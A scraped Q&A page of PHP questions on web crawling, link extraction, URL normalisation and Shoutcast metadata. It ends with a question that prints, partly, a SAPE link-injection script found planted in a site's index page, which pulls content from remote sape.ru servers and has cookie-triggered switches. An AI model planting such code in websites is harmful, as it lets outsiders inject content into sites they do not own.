PHP: follow each link on a page, and the links on those pages


I have a function that returns the links from a given page using a regular expression in PHP.
Now I want to follow each of the found links, then the links on those pages, and so on.
Here is the code I have:
function getLinks($url){
$content = file_get_contents($url);
preg_match_all("|<a [^>]+>(.*)</[^>]+>|U", $content, $links, PREG_PATTERN_ORDER);
$l_clean = array();
foreach($links[0] as $link){
$e_link = explode("href",$link);
$e_link = explode("\"",$e_link[1]);
$f_link = $e_link[1];
if( (substr($f_link,0,strlen('javascript:;')) != "javascript:;")){
$sperator = "";
$first = substr($f_link,0,1);
if($first != "/"){
$f_link = "/$f_link";
}
if(substr($f_link,0,7) != "http://"){
$f_link = "http://" . $sperator . $_SERVER['HTTP_HOST'] . $f_link;
}
$f_link = str_replace("///","//",$f_link);
if(!in_array($f_link, $l_clean)){
array_push($l_clean , $f_link);
}
}
}
}

Just do it recursively, and set a depth to terminate:
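function getLinks($url, $depth){
    // Stop when the depth budget is used up; return an empty list so callers can merge it.
    if( --$depth <= 0 ) return array();
    $content = @file_get_contents($url);
    // Skip pages that could not be fetched.
    if( $content === false ) return array();
    preg_match_all("|<a [^>]+>(.*)</[^>]+>|U", $content, $links, PREG_PATTERN_ORDER);
    $l_clean = array();
    foreach($links[0] as $link){
        $e_link = explode("href",$link);
        // Skip <a> tags that have no double-quoted href attribute.
        if( !isset($e_link[1]) ) continue;
        $e_link = explode("\"",$e_link[1]);
        if( !isset($e_link[1]) ) continue;
        $f_link = $e_link[1];
        if( (substr($f_link,0,strlen('javascript:;')) != "javascript:;")){
            $sperator = "";
            $first = substr($f_link,0,1);
            if($first != "/"){
                $f_link = "/$f_link";
            }
            if(substr($f_link,0,7) != "http://"){
                $f_link = "http://" . $sperator . $_SERVER['HTTP_HOST'] . $f_link;
            }
            $f_link = str_replace("///","//",$f_link);
            if(!in_array($f_link, $l_clean)){
                array_push($l_clean , $f_link);
                // Follow the link one level deeper and keep any new links it yields.
                foreach(getLinks( $f_link, $depth ) as $child){
                    if(!in_array($child, $l_clean)){
                        array_push($l_clean, $child);
                    }
                }
            }
        }
    }
    // Return the collected links so the caller's assignment receives them.
    return $l_clean;
}
$links = getLinks("http://myurl.com", 3);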
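A minimal sketch of the same depth-limited recursion, with two changes that are assumptions of mine rather than part of the answer: links are read with DOMDocument instead of a regular expression, and a shared $visited array keeps pages that link to each other from being fetched twice. The names extractHrefs, crawl and $fetch are hypothetical; $fetch stands in for file_get_contents so the example runs without network access.

```php
<?php
// Extract the href of every <a> element in an HTML string.
function extractHrefs(string $html): array {
    if ($html === '') {
        return []; // DOMDocument::loadHTML rejects empty input
    }
    $doc = new DOMDocument();
    // Suppress warnings caused by malformed real-world markup.
    @$doc->loadHTML($html);
    $hrefs = [];
    foreach ($doc->getElementsByTagName('a') as $a) {
        $href = trim($a->getAttribute('href'));
        if ($href !== '') {
            $hrefs[] = $href;
        }
    }
    return $hrefs;
}

// Depth-limited recursive crawl. $depth is the number of levels to fetch;
// $visited is shared across calls so no URL is fetched twice.
function crawl(string $url, int $depth, callable $fetch, array &$visited): void {
    if ($depth <= 0 || isset($visited[$url])) {
        return;
    }
    $visited[$url] = true;
    foreach (extractHrefs((string) $fetch($url)) as $href) {
        crawl($href, $depth - 1, $fetch, $visited);
    }
}

// Hypothetical in-memory "site" so the sketch runs offline.
$pages = [
    'http://a.test/'  => '<a href="http://a.test/b">b</a><a href="http://a.test/c">c</a>',
    'http://a.test/b' => '<a href="http://a.test/">home</a><a href="http://a.test/d">d</a>',
    'http://a.test/c' => '',
    'http://a.test/d' => '',
];
$fetch = function (string $url) use ($pages) {
    return $pages[$url] ?? '';
};

$visited = [];
crawl('http://a.test/', 2, $fetch, $visited);
print_r(array_keys($visited));
```

With the sample pages and a depth of 2, the visited list holds the start page plus /b and /c; /d is never fetched because it sits one level deeper. The sketch assumes the hrefs are already absolute URLs, so relative links would still need resolving against the page URL.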

Related

How to avoid url with mailto:

I'm working in PHP and have written a function that collects the links from a submitted URL.
The code works, but it also picks up links that are not real pages, such as mailto: and javascript:void(0).
How can I skip a tags whose href looks like href="mailto:", href="tel:" or href="javascript:"?
Thank you in advance.
function check_all_links($url) {
$doc = new DOMDocument();
@$doc->loadHTML(file_get_contents($url));
$linklist = $doc->getElementsByTagName("a");
$title = $doc->getElementsByTagName("title");
$href = array();
$page_url = $full_url = $new_url = "";
$full_url = goodUrl($url);
$scheme = parse_url($url, PHP_URL_SCHEME);
$slash = '/';
$links = array();
$linkNo = array();
if ($scheme == "http") {
foreach ($linklist as $link) {
$href = strtolower($link->getAttribute('href'));
$page_url = parse_url($href, PHP_URL_PATH);
$new_url = $scheme."://".$full_url.'/'.ltrim($page_url, '/');
//check if href has mailto: or # or javascript: or tel:
if (strpos($page_url, "tel:") === True) {
continue;
}
if(!in_array($new_url, $linkNo)) {
echo $new_url."<br>" ;
array_push($linkNo, $new_url);
$links[] = array('Links' => $new_url );
}
}
}else if ($scheme == "https") {
foreach ($linklist as $link) {
$href = strtolower($link->getAttribute('href'));
$page_url = parse_url($href, PHP_URL_PATH);
$new_url = $scheme."://".$full_url.'/'.ltrim($page_url, '/');
if (strpos($page_url, "tel:") === True) {
continue;
}
if(!in_array($new_url, $linkNo)) {
echo $new_url."<br>" ;
array_push($linkNo, $new_url);
$links[] = array('Links' => $new_url );
}
}
}

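You can use the scheme field from the parse_url function result. Note that $page_url only holds the path (it comes from parse_url($href, PHP_URL_PATH)), so parse $href again without the component argument to get the scheme. Also, strpos never returns true, so the === True comparison can never match.
Instead of:
if (strpos($page_url, "tel:") === True) {
continue;
}
you can use:
$parts = parse_url($href);
if (isset($parts["scheme"]) && in_array($parts["scheme"], ["mailto", "tel", "javascript"])) {
continue;
}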
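The scheme check can be wrapped in a small helper. This is a sketch under one assumption of mine: it uses an allowlist (only http and https, plus scheme-less relative links) instead of the deny list above, so schemes nobody thought of are skipped too. The function name isCrawlableHref is hypothetical.

```php
<?php
// Return true when an href looks like something a crawler should follow.
function isCrawlableHref(string $href): bool {
    $href = trim($href);
    // Empty hrefs and pure fragments ("#top") point back at the current page.
    if ($href === '' || $href[0] === '#') {
        return false;
    }
    $scheme = parse_url($href, PHP_URL_SCHEME);
    if ($scheme === false) {
        return false; // parse_url could not make sense of the value
    }
    if ($scheme === null) {
        return true; // no scheme: a relative or protocol-relative link
    }
    // Allowlist: anything that is not http(s) is skipped.
    return in_array(strtolower($scheme), ['http', 'https'], true);
}

$samples = [
    'http://example.com/a',
    '/about.html',
    'mailto:someone@example.com',
    'tel:+15551234567',
    'javascript:void(0)',
    '#top',
];
foreach ($samples as $href) {
    echo $href, ' => ', isCrawlableHref($href) ? 'follow' : 'skip', "\n";
}
```

Inside the foreach loop of check_all_links, the call would go right after reading the attribute, for example: if (!isCrawlableHref($href)) { continue; }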

Function inside an array php

I am working on a web crawler. I have a CSV file with about one million websites that I want to crawl. I can load the CSV file into an array, but when I pass it to the method that crawls, it seems to crawl only the first element instead of the whole array. Can someone help me?
<?php
include("classes/DomDocumentParser.php");
include("config.php");
$alreadyCrawled = array();
$crawling = array();
$alreadyFoundImages = array();
$my_list = array();
function linkExists($url){
global $con;
$query = $con->prepare("SELECT * FROM sites WHERE url = :url");
$query ->bindParam(":url",$url);
$query->execute();
return $query->rowCount() != 0;
}
function insertImage($url,$src,$title,$alt){
global $con;
$query = $con->prepare("INSERT INTO images(siteUrl, imageUrl, alt, title)
VALUES(:siteUrl,:imageUrl,:alt,:title)");
$query ->bindParam(":siteUrl",$url);
$query ->bindParam(":imageUrl",$src);
$query ->bindParam(":alt",$alt);
$query ->bindParam(":title",$title);
return $query->execute();
}
function insertLink($url,$title,$description,$keywords){
global $con;
$query = $con->prepare("INSERT INTO sites(Url, title, description, keywords)
VALUES(:url,:title,:description,:keywords)");
$query ->bindParam(":url",$url);
$query ->bindParam(":title",$title);
$query ->bindParam(":description",$description);
$query ->bindParam(":keywords",$keywords);
return $query->execute();
}
function createLink($src,$url){
$scheme = parse_url($url)["scheme"]; // http or https
$host = parse_url($url)["host"]; // www.mohamad-ahmad.com
if(substr($src,0,2) =="//"){
// //www.mohanadahmad.com
$src = $scheme . ":" . $src;
}
else if(substr($src,0,1) =="/"){
// /aboutus/about.php
$src = $scheme . "://" . $host . $src;
}
else if(substr($src,0,2) =="./"){
// ./aboutus/about.php
$src = $scheme . "://" . $host . dirname(parse_url($url)["path"]) . substr($src ,1);
}
else if(substr($src,0,3) =="../"){
// ../aboutus/about.php
$src = $scheme . "://" . $host . "/" . $src;
}
else if(substr($src,0,5) !="https" && substr($src,0,4) !="http" ){
// aboutus/about.php
$src = $scheme . "://" . $host ."/" .$src;
}
return $src;
}
function getDetails($url){
global $alreadyFoundImages;
$parser = new DomDocumentParser($url);
$titleArray = $parser->getTitletags();
if(sizeof($titleArray) == 0 || $titleArray->item(0) == NULL){
return;
}
$title = $titleArray -> item(0) -> nodeValue;
$title = str_replace("\n","",$title);
if($title == ""){
return;
}
$description="";
$keywords="";
$metasArray = $parser -> getMetatags();
foreach($metasArray as $meta){
if($meta->getAttribute("name") == "description"){
$description = $meta -> getAttribute("content");
}
if($meta->getAttribute("name") == "keywords"){
$keywords = $meta -> getAttribute("content");
}
}
$description = str_replace("\n","",$description);
$keywords = str_replace("\n","",$keywords);
if(linkExists($url)){
echo "$url already exists <br>";
}
else if(insertLink($url,$title,$description,$keywords)){
echo "SUCCESS: $url <br>";
}
else{
echo "ERROR: Failed to insert $url <br>";
}
$imageArray = $parser ->getImages();
foreach($imageArray as $image){
$src = $image->getAttribute("src");
$alt = $image->getAttribute("alt");
$title = $image->getAttribute("title");
if(!$title && !$alt){
continue;
}
$src = createLink($src,$url);
if(!in_array($src,$alreadyFoundImages)){
$alreadyFoundImages[] = $src;
insertImage($url,$src,$alt,$title);
}
}
}
function followLinks($url) {
global $crawling;
global $alreadyCrawled;
$parser = new DomDocumentParser($url);
$linkList = $parser->getLinks();
foreach($linkList as $link){
$href = $link->getAttribute("href");
if(strpos($href,"#") !==false){
// Ignore anchor url
continue;
}
else if(substr($href,0,11)== "javascript:"){
// Ignore javascript url
continue;
}
$href = createLink($href,$url);
if(!in_array($href,$alreadyCrawled)){
$alreadyCrawled[] = $href;
$crawling[] = $href;
//getDetails contain the insert into db
getDetails($href);
}
}
array_shift($crawling);
foreach($crawling as $site){
followLinks($site);
}
}
function fill_my_list(){
global $my_list;
$file = fopen('top-1m.csv', 'r');
while( ($data = fgetcsv($file)) !== false ) {
$startUrl = "https://www.".$data[1];
$my_list[] = $startUrl;
}
foreach($my_list as $key => $u){
followLinks($u);
}
}
fill_my_list();
?>

You can do something like this, adapted from the php.net manual:
$row = 1;
if (($File = fopen("test.csv", "r")) !== FALSE) {
while (($data = fgetcsv($File, 1000, ",")) !== FALSE) {
$num = count($data);
echo "<p> $num fields in line $row: <br /></p>\n";
$row++;
for ($c=0; $c < $num; $c++) {
echo $data[$c] . "<br />\n";
}
// Use the row's fields here, e.g. $data[0], $data[1]
}
fclose($File);
}
More examples here: https://www.php.net/manual/en/function.fgetcsv.php#refsect1-function.fgetcsv-examples
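One possible reason the loop appears stuck on the first site (my reading of the question's code, not something confirmed in the thread) is that followLinks() calls itself for every link it discovers, so the call for the first start URL may not return for a very long time. A sketch of an alternative: read the CSV into a list, then crawl each start URL breadth-first with a hard page limit. loadStartUrls, crawlSite, $getLinks and the limit of 3 are all hypothetical; $getLinks stands in for the DomDocumentParser-based link extraction.

```php
<?php
// Read "rank,domain" rows and return one start URL per row.
function loadStartUrls(string $csvPath): array {
    $urls = [];
    $file = fopen($csvPath, 'r');
    if ($file === false) {
        return $urls;
    }
    while (($data = fgetcsv($file, 0, ',', '"', '\\')) !== false) {
        // Skip blank or short rows instead of building a broken URL.
        if (!isset($data[1]) || trim($data[1]) === '') {
            continue;
        }
        $urls[] = 'https://www.' . trim($data[1]);
    }
    fclose($file);
    return $urls;
}

// Breadth-first crawl of one site with a page limit, so a large site
// cannot keep the outer loop from reaching the next start URL.
// $getLinks: URL in, array of absolute URLs out.
function crawlSite(string $startUrl, callable $getLinks, int $maxPages): array {
    $queue = [$startUrl];
    $seen = [$startUrl => true];
    $crawled = [];
    while ($queue !== [] && count($crawled) < $maxPages) {
        $url = array_shift($queue);
        $crawled[] = $url;
        foreach ($getLinks($url) as $link) {
            if (!isset($seen[$link])) {
                $seen[$link] = true;
                $queue[] = $link;
            }
        }
    }
    return $crawled;
}

// Demo with a temporary CSV and a stub link source.
$csv = tempnam(sys_get_temp_dir(), 'csv');
file_put_contents($csv, "1,example.com\n2,example.org\n\n");
$startUrls = loadStartUrls($csv);
unlink($csv);

$getLinks = function (string $url): array {
    return [$url . '/a', $url . '/b']; // pretend every page has two links
};
foreach ($startUrls as $startUrl) {
    echo implode(', ', crawlSite($startUrl, $getLinks, 3)), "\n";
}
```

Because the queue is local to each crawlSite call, every entry of the CSV gets its own bounded crawl, and the per-page work (such as getDetails) could run where $crawled is appended.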

php convert absolute URL containing relative paths in absolute url without relative path

I have a simple but strange problem, and after a lot of searching I cannot find a function that solves it.
I have a URL like http://example.com/folder/folder2/../image/test.jpg and I would like a function that returns the correct absolute link:
http://example.com/folder/image/test.jpg
The function should take only one parameter, the URL (not a base directory or relative directory as in the examples I found).
Thanks for any help.

Perhaps a starting point:
<?php
function unrelatify($url)
{
$parts = parse_url($url);
$path = $parts['path'] ?? '';
$hierarchy = explode('/', $path);
while(($key = array_search('..', $hierarchy)) !== false) {
if($key-1 > 0)
unset($hierarchy[$key-1]);
unset($hierarchy[$key]);
$hierarchy = array_values($hierarchy);
}
$new_path = implode('/', $hierarchy);
return str_replace($path, $new_path, $url);
}
echo unrelatify('http://example.com/../folder/../folder2/../image/test.jpg#foo?bar=baz');
Output:
http://example.com/image/test.jpg#foo?bar=baz
You may want to look at how browsers and other web clients resolve relative segments in URLs.
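A stack-based variant, sketched here as an alternative to the array_search loop: each path segment is pushed onto a stack, and ".." pops the previous one. It is similar in spirit to the dot-segment removal described in RFC 3986, with one simplification that is my own assumption: empty segments (double slashes) are dropped as well. The function name normalizeUrlPath is hypothetical.

```php
<?php
// Collapse "." and ".." segments in the path of an absolute URL.
function normalizeUrlPath(string $url): string {
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return $url; // not an absolute URL; leave it untouched
    }
    $path = $parts['path'] ?? '/';
    $segments = explode('/', $path);
    $stack = [];
    foreach ($segments as $segment) {
        if ($segment === '' || $segment === '.') {
            continue; // nothing to add (also collapses "//")
        }
        if ($segment === '..') {
            array_pop($stack); // going above the root is silently clamped
            continue;
        }
        $stack[] = $segment;
    }
    $newPath = '/' . implode('/', $stack);
    // Keep a trailing slash when the original path named a directory.
    $last = end($segments);
    if ($stack !== [] && in_array($last, ['', '.', '..'], true)) {
        $newPath .= '/';
    }
    // Reassemble the URL from its parsed components.
    $out = $parts['scheme'] . '://';
    if (isset($parts['user'])) {
        $out .= $parts['user'] . (isset($parts['pass']) ? ':' . $parts['pass'] : '') . '@';
    }
    $out .= $parts['host'] . (isset($parts['port']) ? ':' . $parts['port'] : '');
    $out .= $newPath;
    $out .= isset($parts['query']) ? '?' . $parts['query'] : '';
    $out .= isset($parts['fragment']) ? '#' . $parts['fragment'] : '';
    return $out;
}

echo normalizeUrlPath('http://example.com/folder/folder2/../image/test.jpg'), "\n";
```

Rebuilding the URL from the parsed parts, rather than calling str_replace on the whole string, avoids accidentally rewriting a query string or fragment that happens to contain the same text as the path.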

Thanks to everyone for your answers.
Here is a recap, along with some other approaches I have tested:
<?php
function unrelatify($url) {
$parts = parse_url($url);
$path = $parts['path'];
$hierarchy = explode('/', $path);
while (($key = array_search('..', $hierarchy)) !== false) {
if ($key - 1 > 0)
unset($hierarchy[$key - 1]);
unset($hierarchy[$key]);
$hierarchy = array_values($hierarchy);
}
$new_path = implode('/', $hierarchy);
return str_replace($path, $new_path, $url);
}
function normalizePath($path) {
do {
$path = preg_replace(
array('#//|/\./#', '#/([^/.]+)/\.\./#'), '/', $path, -1, $count
);
} while ($count > 0);
return str_replace('../', '', $path);
}
function processUrl($url) {
$parsedUrl = parse_url($url);
$path = $parsedUrl['path'];
$pathSegments = explode("/", $path);
$iterator = 0;
$removedElements = 0;
foreach ($pathSegments as $segment) {
if ($segment == "..") {
if ($iterator - $removedElements - 1 < 0) {
return false;
}
unset($pathSegments[$iterator - $removedElements - 1]);
unset($pathSegments[$iterator]);
$removedElements += 2;
}
$iterator++;
}
$parsedUrl['path'] = implode("/", $pathSegments);
$newUrl = $parsedUrl['scheme'] . '://' . $parsedUrl['host'] . "/" . $parsedUrl['path'];
return $newUrl;
}
function path_normalize($path) {
$path = str_replace('\\', '/', $path);
// each() was removed in PHP 8 and a null limit is deprecated, so use -1 and foreach.
$blocks = preg_split('#/#', $path, -1, PREG_SPLIT_NO_EMPTY);
$res = array();
foreach ($blocks as $k => $block) {
switch ($block) {
case '.':
if ($k == 0)
$res = explode('/', path_normalize(getcwd()));
break;
case '..':
if (!$res)
return false;
array_pop($res);
break;
default:
$res[] = $block;
break;
}
}
$r = implode('/', $res);
return $r;
}
echo 'path_normalize<br />';
$url = 'http://www.example.com/modules/newsletters/../../images/homeslider-images/test-5.jpg';
echo $url . ' === > ' . path_normalize($url);
echo '<hr />';
$url = 'http://www.example.com/../../images/homeslider-images/test-5.jpg';
echo $url . ' === > ' . path_normalize($url);
echo '<hr />normalizePath<br />';
$url = 'http://www.example.com/modules/newsletters/../../images/homeslider-images/test-5.jpg';
echo $url . ' === > ' . normalizePath($url);
echo '<hr />';
$url = 'http://www.example.com/../../images/homeslider-images/test-5.jpg';
echo $url . ' === > ' . normalizePath($url);
echo '<hr />unrelatify<br />';
$url = 'http://www.example.com/modules/newsletters/../../images/homeslider-images/test-5.jpg';
echo $url . ' === > ' . unrelatify($url);
echo '<hr />';
$url = 'http://www.example.com/../../images/homeslider-images/test-5.jpg';
echo $url . ' === > ' . unrelatify($url);
echo '<hr />processUrl<br />';
$url = 'http://www.example.com/modules/newsletters/../../images/homeslider-images/test-5.jpg';
echo $url . ' === > ' . processUrl($url);
echo '<hr />';
$url = 'http://www.example.com/../../images/homeslider-images/test-5.jpg';
echo $url . ' === > ' . processUrl($url);
?>

PHP script to extract artist & title from Shoutcast/Icecast stream

I found a script that can extract the artist and title from an Icecast or Shoutcast stream.
I want the script to update automatically when the song changes; at the moment it only works when I execute it. I'm new to PHP, so any help will be appreciated.
Thanks!
define('CRLF', "\r\n");
class streaminfo{
public $valid = false;
public $useragent = 'Winamp 2.81';
protected $headers = array();
protected $metadata = array();
public function __construct($location){
$errno = $errstr = '';
$t = parse_url($location);
$sock = fsockopen($t['host'], $t['port'], $errno, $errstr, 5);
$path = isset($t['path'])?$t['path']:'/';
if ($sock){
$request = 'GET '.$path.' HTTP/1.0' . CRLF .
'Host: ' . $t['host'] . CRLF .
'Connection: Close' . CRLF .
'User-Agent: ' . $this->useragent . CRLF .
'Accept: */*' . CRLF .
'icy-metadata: 1'.CRLF.
'icy-prebuffer: 65536'.CRLF.
(isset($t['user'])?'Authorization: Basic '.base64_encode($t['user'].':'.$t['pass']).CRLF:'').
'X-TipOfTheDay: Winamp "Classic" rulez all of them.' . CRLF . CRLF;
if (fwrite($sock, $request)){
$theaders = $line = '';
while (!feof($sock)){
$line = fgets($sock, 4096);
if('' == trim($line)){
break;
}
$theaders .= $line;
}
$theaders = explode(CRLF, $theaders);
foreach ($theaders as $header){
$t = explode(':', $header);
if (isset($t[0]) && trim($t[0]) != ''){
$name = preg_replace('/[^a-z][^a-z0-9]*/i','', strtolower(trim($t[0])));
array_shift($t);
$value = trim(implode(':', $t));
if ($value != ''){
if (is_numeric($value)){
$this->headers[$name] = (int)$value;
}else{
$this->headers[$name] = $value;
}
}
}
}
if (!isset($this->headers['icymetaint'])){
$data = ''; $metainterval = 512;
while(!feof($sock)){
$data .= fgetc($sock);
if (strlen($data) >= $metainterval) break;
}
$this->print_data($data);
$matches = array();
preg_match_all('/([\x00-\xff]{2})\x0\x0([a-z]+)=/i', $data, $matches, PREG_OFFSET_CAPTURE);
preg_match_all('/([a-z]+)=([a-z0-9\(\)\[\]., ]+)/i', $data, $matches, PREG_SPLIT_NO_EMPTY);
echo '<pre>';var_dump($matches);echo '</pre>';
$title = $artist = '';
foreach ($matches[0] as $nr => $values){
$offset = $values[1];
// Curly-brace string offsets were removed in PHP 8; use square brackets.
$length = ord($values[0][0]) +
(ord($values[0][1]) * 256)+
(ord($values[0][2]) * 256*256)+
(ord($values[0][3]) * 256*256*256);
$info = substr($data, $offset + 4, $length);
$seperator = strpos($info, '=');
$this->metadata[substr($info, 0, $seperator)] = substr($info, $seperator + 1);
if (substr($info, 0, $seperator) == 'title') $title = substr($info, $seperator + 1);
if (substr($info, 0, $seperator) == 'artist') $artist = substr($info, $seperator + 1);
}
$this->metadata['streamtitle'] = $artist . ' - ' . $title;
}else{
$metainterval = $this->headers['icymetaint'];
$intervals = 0;
$metadata = '';
while(1){
$data = '';
while(!feof($sock)){
$data .= fgetc($sock);
if (strlen($data) >= $metainterval) break;
}
//$this->print_data($data);
$len = join(unpack('c', fgetc($sock))) * 16;
if ($len > 0){
$metadata = str_replace("\0", '', fread($sock, $len));
break;
}else{
$intervals++;
if ($intervals > 100) break;
}
}
$metarr = explode(';', $metadata);
foreach ($metarr as $meta){
$t = explode('=', $meta);
if (isset($t[0]) && trim($t[0]) != ''){
$name = preg_replace('/[^a-z][^a-z0-9]*/i','', strtolower(trim($t[0])));
array_shift($t);
$value = trim(implode('=', $t));
if (substr($value, 0, 1) == '"' || substr($value, 0, 1) == "'"){
$value = substr($value, 1);
}
if (substr($value, -1) == '"' || substr($value, -1) == "'"){
$value = substr($value, 0, -1);
}
if ($value != ''){
$this->metadata[$name] = $value;
}
}
}
}
fclose($sock);
$this->valid = true;
}else echo 'unable to write.';
}else echo 'no socket '.$errno.' - '.$errstr.'.';
}
public function print_data($data){
$data = str_split($data);
$c = 0;
$string = '';
echo "<pre>\n000000 ";
foreach ($data as $char){
$string .= addcslashes($char, "\n\r\0\t");
$hex = dechex(join(unpack('C', $char)));
if ($c % 4 == 0) echo ' ';
if ($c % (4*4) == 0 && $c != 0){
foreach (str_split($string) as $s){
//echo " $string\n";
if (ord($s) < 32 || ord($s) > 126){
echo '\\'.ord($s);
}else{
echo $s;
}
}
echo "\n";
$string = '';
echo str_pad($c, 6, '0', STR_PAD_LEFT).' ';
}
if (strlen($hex) < 1) $hex = '00';
if (strlen($hex) < 2) $hex = '0'.$hex;
echo $hex.' ';
$c++;
}
echo " $string\n</pre>";
}
public function __get($name){
if (isset($this->metadata[$name])){
return $this->metadata[$name];
}
if (isset($this->headers[$name])){
return $this->headers[$name];
}
return null;
}
}
$t = new streaminfo('http://64.236.34.196:80/stream/1014'); // get metadata
echo Meta Interval: $t->icymetaint;
echo Current Track: $t->streamtitle;

You will need to constantly query the stream at a set interval to find when the song changes.
This is best done by scheduling a cron job.
If you are on Windows, use the Windows Task Scheduler instead.
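A scheduled run only needs to know whether the title differs from the one seen last time. The sketch below keeps the previous title in a small state file; the function name trackChanged and the state file location are hypothetical, and the titles in the demo are made-up sample data.

```php
<?php
// Compare the freshly read title with the one stored by the previous run.
// Returns true (and updates the state file) only when the title changed.
function trackChanged(string $currentTitle, string $stateFile): bool {
    $previous = is_file($stateFile) ? file_get_contents($stateFile) : null;
    if ($previous === $currentTitle) {
        return false;
    }
    // LOCK_EX guards against two overlapping runs writing at once.
    file_put_contents($stateFile, $currentTitle, LOCK_EX);
    return true;
}

// Demo with a temporary state file and sample titles.
$stateFile = tempnam(sys_get_temp_dir(), 'trk');
$first  = trackChanged('Artist A - Song 1', $stateFile); // new title
$second = trackChanged('Artist A - Song 1', $stateFile); // same title again
$third  = trackChanged('Artist B - Song 2', $stateFile); // song changed
unlink($stateFile);
var_dump($first, $second, $third);
```

In the scheduled script, the current title would come from the class in the question, for example trackChanged((string) $t->streamtitle, __DIR__ . '/last_track.txt'), and whatever should happen on a song change goes inside the if branch.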

If you want to run the PHP script to keep your metadata up to date (I'm assuming you're making a website and using HTML audio tags here), you can use the ontimeupdate event with an AJAX function. If you're not, look up your audio playback documentation for something similar.
<audio src="http://ip:port/;" ontimeupdate="loadXMLDoc()">
You can find a great example here: http://www.w3schools.com/php/php_ajax_php.asp
Have the PHP script echo all the relevant information at once, using one PHP variable at the very end of your script.
<?php ....
$phpVar=$streamtitle;
$phpVar2=$streamsong;
$result="I want my string to look like this: <br> {$phpVar} {$phpVar2}";
echo $result;
?>
Then use the function called by .onreadystatechange to modify the particular elements you want on your website using .responseText (this will contain the same content as your PHP script's echo).
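If several values have to reach the page, one option (an assumption of mine; the answer above echoes a ready-made HTML string) is to echo a single JSON object and let the JavaScript callback pick the fields out of responseText with JSON.parse. The function name buildTrackPayload and the sample values are hypothetical.

```php
<?php
// Build the response body for the AJAX call: one JSON object with all fields.
function buildTrackPayload(?string $artist, ?string $title): string {
    $json = json_encode(
        [
            'artist' => $artist ?? '',
            'title'  => $title ?? '',
        ],
        // Stream metadata is not always valid UTF-8; substitute bad bytes
        // instead of letting json_encode fail.
        JSON_UNESCAPED_UNICODE | JSON_UNESCAPED_SLASHES | JSON_INVALID_UTF8_SUBSTITUTE
    );
    return $json === false ? '{}' : $json;
}

// At the very end of the script, send everything in one echo.
echo buildTrackPayload('AC/DC', 'Back in Black');
```

A real endpoint would also send a Content-Type: application/json header before the echo.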

After SCOURING the web for 4 hours, this is the only Shoutcast metadata script I've found that works! Thank you.
To run this constantly, why not use a setInterval combined with jQuery's AJAX call?
<script>
$(function() {
setInterval(getTrackName,16000);
});
function getTrackName() {
$.ajax({
url: "track_name.php"
})
.done(function( data ) {
$( "#results" ).text( data );
});
}
</script>
Also, your last couple of 'echo' lines were breaking the script for me. Just put quotes around the Meta Interval text, etc.

Hacker Backdoor script? [closed]

Closed. This question is off-topic. It is not currently accepting answers.
Closed 10 years ago.
I found this script attached to a modified index page. It looks like some kind of backdoor. And who is this SAPE?
<?php
class SAPE_base {
var $_version = '1.0.8';
var $_verbose = false;
var $_charset = '';
var $_sape_charset = '';
var $_server_list = array('dispenser-01.sape.ru', 'dispenser-02.sape.ru');
var $_cache_lifetime = 3600;
var $_cache_reloadtime = 600;
var $_error = '';
var $_host = '';
var $_request_uri = '';
var $_multi_site = false;
var $_fetch_remote_type = '';
var $_socket_timeout = 6;
var $_force_show_code = false;
var $_is_our_bot = false;
var $_debug = false;
var $_ignore_case = false;
var $_db_file = '';
var $_use_server_array = false;
var $_force_update_db = false;
function SAPE_base($options = null) {
$host = '';
if (is_array($options)) {
if (isset($options['host'])) {
$host = $options['host'];
}
}
elseif (strlen($options)) {
$host = $options;
$options = array();
}
else {
$options = array();
}
if (isset($options['use_server_array']) && $options['use_server_array'] == true) {
$this->_use_server_array = true;
}
if (strlen($host)) {
$this->_host = $host;
}
else {
$this->_host = $_SERVER['HTTP_HOST'];
}
$this->_host = preg_replace('/^http:\/\//', '', $this->_host);
$this->_host = preg_replace('/^www\./', '', $this->_host);
if (isset($options['request_uri']) && strlen($options['request_uri'])) {
$this->_request_uri = $options['request_uri'];
}
elseif ($this->_use_server_array === false) {
$this->_request_uri = getenv('REQUEST_URI');
}
if (strlen($this->_request_uri) == 0) {
$this->_request_uri = $_SERVER['REQUEST_URI'];
}
if (isset($options['multi_site']) && $options['multi_site'] == true) {
$this->_multi_site = true;
}
if (isset($options['debug']) && $options['debug'] == true) {
$this->_debug = true;
}
if (isset($_COOKIE['sape_cookie']) && ($_COOKIE['sape_cookie'] == _SAPE_USER)) {
$this->_is_our_bot = true;
if (isset($_COOKIE['sape_debug']) && ($_COOKIE['sape_debug'] == 1)) {
$this->_debug = true;
$this->_options = $options;
$this->_server_request_uri = $this->_request_uri = $_SERVER['REQUEST_URI'];
$this->_getenv_request_uri = getenv('REQUEST_URI');
$this->_SAPE_USER = _SAPE_USER;
}
if (isset($_COOKIE['sape_updatedb']) && ($_COOKIE['sape_updatedb'] == 1)) {
$this->_force_update_db = true;
}
}
else {
$this->_is_our_bot = false;
}
if (isset($options['verbose']) && $options['verbose'] == true || $this->_debug) {
$this->_verbose = true;
}
if (isset($options['charset']) && strlen($options['charset'])) {
$this->_charset = $options['charset'];
}
else {
$this->_charset = 'windows-1251';
}
if (isset($options['fetch_remote_type']) && strlen($options['fetch_remote_type'])) {
$this->_fetch_remote_type = $options['fetch_remote_type'];
}
if (isset($options['socket_timeout']) && is_numeric($options['socket_timeout']) && $options['socket_timeout'] > 0) {
$this->_socket_timeout = $options['socket_timeout'];
}
if (isset($options['force_show_code']) && $options['force_show_code'] == true) {
$this->_force_show_code = true;
}
if (!defined('_SAPE_USER')) {
return $this->raise_error('The _SAPE_USER constant is not defined');
}
if (isset($options['ignore_case']) && $options['ignore_case'] == true) {
$this->_ignore_case = true;
$this->_request_uri = strtolower($this->_request_uri);
}
}
function fetch_remote_file($host, $path) {
$user_agent = $this->_user_agent . ' ' . $this->_version;
@ini_set('allow_url_fopen', 1);
@ini_set('default_socket_timeout', $this->_socket_timeout);
@ini_set('user_agent', $user_agent);
if (
$this->_fetch_remote_type == 'file_get_contents'
||
(
$this->_fetch_remote_type == ''
&&
function_exists('file_get_contents')
&&
ini_get('allow_url_fopen') == 1
)
) {
$this->_fetch_remote_type = 'file_get_contents';
if ($data = @file_get_contents('http://' . $host . $path)) {
return $data;
}
}
elseif (
$this->_fetch_remote_type == 'curl'
||
(
$this->_fetch_remote_type == ''
&&
function_exists('curl_init')
)
) {
$this->_fetch_remote_type = 'curl';
if ($ch = @curl_init()) {
@curl_setopt($ch, CURLOPT_URL, 'http://' . $host . $path);
@curl_setopt($ch, CURLOPT_HEADER, false);
